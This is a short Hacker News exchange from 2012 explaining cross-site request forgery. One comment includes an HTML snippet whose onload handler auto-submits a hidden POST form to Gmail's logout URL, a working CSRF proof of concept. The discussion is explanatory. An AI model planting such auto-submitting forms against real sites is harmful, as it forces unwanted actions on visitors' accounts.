That doesn't solve it because the attacker can just create a <form> and ... | Hacker News

Hacker Newsnew | past | comments | ask | show | jobs | submit

		gibybo on March 30, 2012 \| parent \| context \| favorite \| on: #1 CSRF Is A Vulnerability In All Browsers That doesn't solve it because the attacker can just create a <form> and auto submit it with js (or make a translucent submit button that is the size of the entire page if you have JS disabled).

someone13 on March 30, 2012 [–]

For example:

    <body onload="javascript:document.evil.submit()">
      <form name="evil" method="POST" action="https://mail.google.com/mail/u/0/?logout">
      </form>
    </body>

The massive button is left as an exercise to the reader ;-)

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact